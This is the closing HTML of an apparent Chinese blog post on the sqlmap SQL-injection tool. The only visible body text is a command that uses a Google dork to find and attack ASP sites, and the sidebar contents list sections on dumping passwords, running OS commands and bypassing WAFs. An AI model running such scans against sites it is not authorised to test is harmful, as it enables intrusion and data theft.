<p><code>sqlmap.py -g “inurl:asp?id=1” /*””内为搜索语法，如：inurl,intitle,site,filetype</code></p>

      
    </div>
	
	<div>
	
		<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>史前感谢您的来访-------------</div>
    
</div>
	
	</div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/安全工具/" rel="tag"># 安全工具</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/09/Phpstorm-phpstudy-xdebug代码审计平台/" rel="next" title="Phpstorm+phpstudy+xdebug代码审计平台">
                <i class="fa fa-chevron-left"></i> Phpstorm+phpstudy+xdebug代码审计平台
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/10/应急响应/" rel="prev" title="应急响应">
                应急响应 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">shiqian</p>
              <p class="site-description motion-element" itemprop="description">繁华一场梦</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入的类型"><span class="nav-number">1.</span> <span class="nav-text">SQL注入的类型</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQLMAP对URL的操作"><span class="nav-number">2.</span> <span class="nav-text">SQLMAP对URL的操作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQLMAP支持的数据库"><span class="nav-number">3.</span> <span class="nav-text">SQLMAP支持的数据库</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#必备骚操作参数"><span class="nav-number">4.</span> <span class="nav-text">必备骚操作参数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、观察注入数据"><span class="nav-number">4.1.</span> <span class="nav-text">一、观察注入数据</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#【如果想看到测试的payload就用等级3】"><span class="nav-number">4.1.0.0.1.</span> <span class="nav-text">【如果想看到测试的payload就用等级3】</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、获取目标方式"><span class="nav-number">4.2.</span> <span class="nav-text">二、获取目标方式</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-直接连接到数据库"><span class="nav-number">4.2.0.0.1.</span> <span class="nav-text">1.直接连接到数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-目标URL"><span class="nav-number">4.2.0.0.2.</span> <span class="nav-text">2.目标URL</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-从Burp或WebScarab代理中获取日志"><span class="nav-number">4.2.0.0.3.</span> <span class="nav-text">3.从Burp或WebScarab代理中获取日志</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-从文本中获取多个目标扫描"><span class="nav-number">4.2.0.0.4.</span> <span class="nav-text">4.从文本中获取多个目标扫描</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-从文件中加载HTTP请求"><span class="nav-number">4.2.0.0.5.</span> <span class="nav-text">5.从文件中加载HTTP请求</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-处理Google的搜索结果"><span class="nav-number">4.2.0.0.6.</span> <span class="nav-text">6.处理Google的搜索结果</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#7-从一个配置加载选项INI文件"><span class="nav-number">4.2.0.0.7.</span> <span class="nav-text">7.从一个配置加载选项INI文件</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、请求方式"><span class="nav-number">4.3.</span> <span class="nav-text">三、请求方式</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-http数据"><span class="nav-number">4.3.0.0.1.</span> <span class="nav-text">1.http数据</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-参数拆分字符"><span class="nav-number">4.3.0.0.2.</span> <span class="nav-text">2.参数拆分字符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-HTTP-cookie头"><span class="nav-number">4.3.0.0.3.</span> <span class="nav-text">3.HTTP cookie头</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-HTTP-User-Agent头"><span class="nav-number">4.3.0.0.4.</span> <span class="nav-text">4.HTTP User-Agent头</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-HTTP-Host头"><span class="nav-number">4.3.0.0.5.</span> <span class="nav-text">5.HTTP Host头</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-HTTP-Referer头"><span class="nav-number">4.3.0.0.6.</span> <span class="nav-text">6.HTTP Referer头</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#7-额外的HTTP头"><span class="nav-number">4.3.0.0.7.</span> <span class="nav-text">7.额外的HTTP头</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#8-HTTP认证保护"><span class="nav-number">4.3.0.0.8.</span> <span class="nav-text">8.HTTP认证保护</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#9-HTTP协议的证书认证"><span class="nav-number">4.3.0.0.9.</span> <span class="nav-text">9.HTTP协议的证书认证</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#10-HTTP协议私有密钥身份认证"><span class="nav-number">4.3.0.0.10.</span> <span class="nav-text">10.HTTP协议私有密钥身份认证</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#11-HTTP-S-代理"><span class="nav-number">4.3.0.0.11.</span> <span class="nav-text">11.HTTP(S)代理</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#12-Tor网络匿名"><span class="nav-number">4.3.0.0.12.</span> <span class="nav-text">12.Tor网络匿名</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#13-HTTP请求延迟"><span class="nav-number">4.3.0.0.13.</span> <span class="nav-text">13.HTTP请求延迟</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#14-设定超时时间"><span class="nav-number">4.3.0.0.14.</span> <span class="nav-text">14.设定超时时间</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#15-设定重试超时"><span class="nav-number">4.3.0.0.15.</span> <span class="nav-text">15.设定重试超时</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#16-设置随机改变的参数值"><span class="nav-number">4.3.0.0.16.</span> <span class="nav-text">16.设置随机改变的参数值</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#17-利用正则过滤目标网址"><span class="nav-number">4.3.0.0.17.</span> <span class="nav-text">17.利用正则过滤目标网址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#18-避免过多的错误请求被屏蔽"><span class="nav-number">4.3.0.0.18.</span> <span class="nav-text">18.避免过多的错误请求被屏蔽</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#19-使用SSL-HTTPS"><span class="nav-number">4.3.0.0.19.</span> <span class="nav-text">19.使用SSL/HTTPS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#20-关掉URL参数值编码"><span class="nav-number">4.3.0.0.20.</span> <span class="nav-text">20.关掉URL参数值编码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#21-每次请求时候执行自定义的python代码"><span class="nav-number">4.3.0.0.21.</span> <span class="nav-text">21.每次请求时候执行自定义的python代码</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、优化"><span class="nav-number">4.4.</span> <span class="nav-text">四、优化</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-收集优化"><span class="nav-number">4.4.0.0.1.</span> <span class="nav-text">1.收集优化</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-输出预测"><span class="nav-number">4.4.0.0.2.</span> <span class="nav-text">2.输出预测</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-HTTP活动"><span class="nav-number">4.4.0.0.3.</span> <span class="nav-text">3.HTTP活动</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-HTTP空连接"><span class="nav-number">4.4.0.0.4.</span> <span class="nav-text">4.HTTP空连接</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-并发HTTP-S-请求"><span class="nav-number">4.4.0.0.5.</span> <span class="nav-text">5.并发HTTP(S)请求</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、探测"><span class="nav-number">4.5.</span> <span class="nav-text">五、探测</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-测试参数"><span class="nav-number">4.5.0.0.1.</span> <span class="nav-text">1.测试参数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-URI注入点"><span class="nav-number">4.5.0.0.2.</span> <span class="nav-text">2.URI注入点</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-指定数据库"><span class="nav-number">4.5.0.0.3.</span> <span class="nav-text">3.指定数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-风险等级"><span class="nav-number">4.5.0.0.4.</span> <span class="nav-text">4.风险等级</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-页面比较"><span class="nav-number">4.5.0.0.5.</span> <span class="nav-text">5.页面比较</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、注入技术"><span class="nav-number">4.6.</span> <span class="nav-text">六、注入技术</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-测试是否是注入"><span class="nav-number">4.6.0.0.1.</span> <span class="nav-text">1.测试是否是注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-设定延时注入的时间"><span class="nav-number">4.6.0.0.2.</span> <span class="nav-text">2.设定延时注入的时间</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-设定UNION查询字段数"><span class="nav-number">4.6.0.0.3.</span> <span class="nav-text">3.设定UNION查询字段数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-设定UNION查询使用的字符"><span class="nav-number">4.6.0.0.4.</span> <span class="nav-text">4.设定UNION查询使用的字符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-DNS泄露攻击"><span class="nav-number">4.6.0.0.5.</span> <span class="nav-text">5.DNS泄露攻击</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-二阶SQL注入"><span class="nav-number">4.6.0.0.6.</span> <span class="nav-text">6.二阶SQL注入</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#七、指纹"><span class="nav-number">4.7.</span> <span class="nav-text">七、指纹</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#数据库管理系统指纹"><span class="nav-number">4.7.0.0.1.</span> <span class="nav-text">数据库管理系统指纹</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#八、列数据"><span class="nav-number">4.8.</span> <span class="nav-text">八、列数据</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-标志"><span class="nav-number">4.8.0.0.1.</span> <span class="nav-text">1.标志</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-用户"><span class="nav-number">4.8.0.0.2.</span> <span class="nav-text">2.用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-当前数据库"><span class="nav-number">4.8.0.0.3.</span> <span class="nav-text">3.当前数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-当前用户是否为管理员"><span class="nav-number">4.8.0.0.4.</span> <span class="nav-text">4.当前用户是否为管理员</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-列数据库管理用户"><span class="nav-number">4.8.0.0.5.</span> <span class="nav-text">5.列数据库管理用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-列出并破解数据库用户的hash"><span class="nav-number">4.8.0.0.6.</span> <span class="nav-text">6.列出并破解数据库用户的hash</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#7-列出数据库管理员权限"><span class="nav-number">4.8.0.0.7.</span> <span class="nav-text">7.列出数据库管理员权限</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#8-列出数据库管理员角色"><span class="nav-number">4.8.0.0.8.</span> <span class="nav-text">8.列出数据库管理员角色</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#9-列出数据库系统的数据库"><span class="nav-number">4.8.0.0.9.</span> <span class="nav-text">9.列出数据库系统的数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#10-列举数据库表"><span class="nav-number">4.8.0.0.10.</span> <span class="nav-text">10.列举数据库表</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#11-列举数据库表中的字段"><span class="nav-number">4.8.0.0.11.</span> <span class="nav-text">11.列举数据库表中的字段</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#12-获取表中数据个数"><span class="nav-number">4.8.0.0.12.</span> <span class="nav-text">12.获取表中数据个数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#13-获取整个表的数据"><span class="nav-number">4.8.0.0.13.</span> <span class="nav-text">13.获取整个表的数据</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#14-获取所有数据库表的内容"><span class="nav-number">4.8.0.0.14.</span> <span class="nav-text">14.获取所有数据库表的内容</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#15-搜索字段，表，数据库"><span class="nav-number">4.8.0.0.15.</span> <span class="nav-text">15.搜索字段，表，数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#16-运行自定义的SQL语句"><span class="nav-number">4.8.0.0.16.</span> <span class="nav-text">16.运行自定义的SQL语句</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#九、爆破"><span class="nav-number">4.9.</span> <span class="nav-text">九、爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-暴力破解表名"><span class="nav-number">4.9.0.0.1.</span> <span class="nav-text">1.暴力破解表名</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-暴力破解列名"><span class="nav-number">4.9.0.0.2.</span> <span class="nav-text">2.暴力破解列名</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十、用户自定义函数注入"><span class="nav-number">4.10.</span> <span class="nav-text">十、用户自定义函数注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十一、系统文件操作"><span class="nav-number">4.11.</span> <span class="nav-text">十一、系统文件操作</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-从数据库服务器中读取文件"><span class="nav-number">4.11.0.0.1.</span> <span class="nav-text">1.从数据库服务器中读取文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-把文件上传到数据库服务器中"><span class="nav-number">4.11.0.0.2.</span> <span class="nav-text">2.把文件上传到数据库服务器中</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十二、操作系统"><span class="nav-number">4.12.</span> <span class="nav-text">十二、操作系统</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-运行任意操作系统命令"><span class="nav-number">4.12.0.0.1.</span> <span class="nav-text">1.运行任意操作系统命令</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-Meterpreter配合使用"><span class="nav-number">4.12.0.0.2.</span> <span class="nav-text">2.Meterpreter配合使用</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十三、对windows注册表操作"><span class="nav-number">4.13.</span> <span class="nav-text">十三、对windows注册表操作</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-读Windows注册表键值"><span class="nav-number">4.13.0.0.1.</span> <span class="nav-text">1.读Windows注册表键值</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-写Windows注册表键值"><span class="nav-number">4.13.0.0.2.</span> <span class="nav-text">2.写Windows注册表键值</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-删除Windows注册表键值"><span class="nav-number">4.13.0.0.3.</span> <span class="nav-text">3.删除Windows注册表键值</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十四、其他"><span class="nav-number">4.14.</span> <span class="nav-text">十四、其他</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-使用简写"><span class="nav-number">4.14.0.0.1.</span> <span class="nav-text">1.使用简写</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-在成功检测到注入点时报警"><span class="nav-number">4.14.0.0.2.</span> <span class="nav-text">2.在成功检测到注入点时报警</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-设置问题的回答"><span class="nav-number">4.14.0.0.3.</span> <span class="nav-text">3.设置问题的回答</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-在成功检测到注入点时发出“嘟”声"><span class="nav-number">4.14.0.0.4.</span> <span class="nav-text">4.在成功检测到注入点时发出“嘟”声</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-清除sqlmap创建的临时表和自定义函数"><span class="nav-number">4.14.0.0.5.</span> <span class="nav-text">5.清除sqlmap创建的临时表和自定义函数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-检查依赖"><span class="nav-number">4.14.0.0.6.</span> <span class="nav-text">6.检查依赖</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#7-关闭彩色输出"><span class="nav-number">4.14.0.0.7.</span> <span class="nav-text">7.关闭彩色输出</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#8-指定使用Google-dork结果的某页"><span class="nav-number">4.14.0.0.8.</span> <span class="nav-text">8.指定使用Google dork结果的某页</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#9-使用HTTP参数污染"><span class="nav-number">4.14.0.0.9.</span> <span class="nav-text">9.使用HTTP参数污染</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#10-彻底检测WAF-IPS-IDS"><span class="nav-number">4.14.0.0.10.</span> <span class="nav-text">10.彻底检测WAF/IPS/IDS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#11-模仿智能手机"><span class="nav-number">4.14.0.0.11.</span> <span class="nav-text">11.模仿智能手机</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#12-离线模式（仅仅使用会话数据）"><span class="nav-number">4.14.0.0.12.</span> <span class="nav-text">12.离线模式（仅仅使用会话数据）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#13-在Google-dork中展示页面权重"><span class="nav-number">4.14.0.0.13.</span> <span class="nav-text">13.在Google dork中展示页面权重</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#14-从输出目录中安全移除所有内容"><span class="nav-number">4.14.0.0.14.</span> <span class="nav-text">14.从输出目录中安全移除所有内容</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#15-快速扫描"><span class="nav-number">4.14.0.0.15.</span> <span class="nav-text">15.快速扫描</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#16-通过关键词使用或跳过payload"><span class="nav-number">4.14.0.0.16.</span> <span class="nav-text">16.通过关键词使用或跳过payload</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#17-交互式sqlmap-Shell"><span class="nav-number">4.14.0.0.17.</span> <span class="nav-text">17.交互式sqlmap Shell</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#18-为初学者准备的简单向导"><span class="nav-number">4.14.0.0.18.</span> <span class="nav-text">18.为初学者准备的简单向导</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一把梭之脚本"><span class="nav-number">4.15.</span> <span class="nav-text">一把梭之脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#穿WAF脚本"><span class="nav-number">4.15.0.1.</span> <span class="nav-text">穿WAF脚本</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一把梭之Post注入"><span class="nav-number">4.16.</span> <span class="nav-text">一把梭之Post注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#方法一"><span class="nav-number">4.16.0.0.1.</span> <span class="nav-text">方法一:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#方法二"><span class="nav-number">4.16.0.0.2.</span> <span class="nav-text">方法二:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#方法三"><span class="nav-number">4.16.0.0.3.</span> <span class="nav-text">方法三:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#方法四"><span class="nav-number">4.16.0.0.4.</span> <span class="nav-text">方法四:</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一把梭之cookie注入"><span class="nav-number">4.17.</span> <span class="nav-text">一把梭之cookie注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#方法一-1"><span class="nav-number">4.17.0.0.1.</span> <span class="nav-text">方法一:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#方法二-1"><span class="nav-number">4.17.0.0.2.</span> <span class="nav-text">方法二:</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一次sqlmap注入某注入点并且dump出账号密码全程"><span class="nav-number">4.18.</span> <span class="nav-text">一次sqlmap注入某注入点并且dump出账号密码全程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQLMAP-–tamper-绕过WAF脚本"><span class="nav-number">5.</span> <span class="nav-text">SQLMAP –tamper 绕过WAF脚本</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">shiqian</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
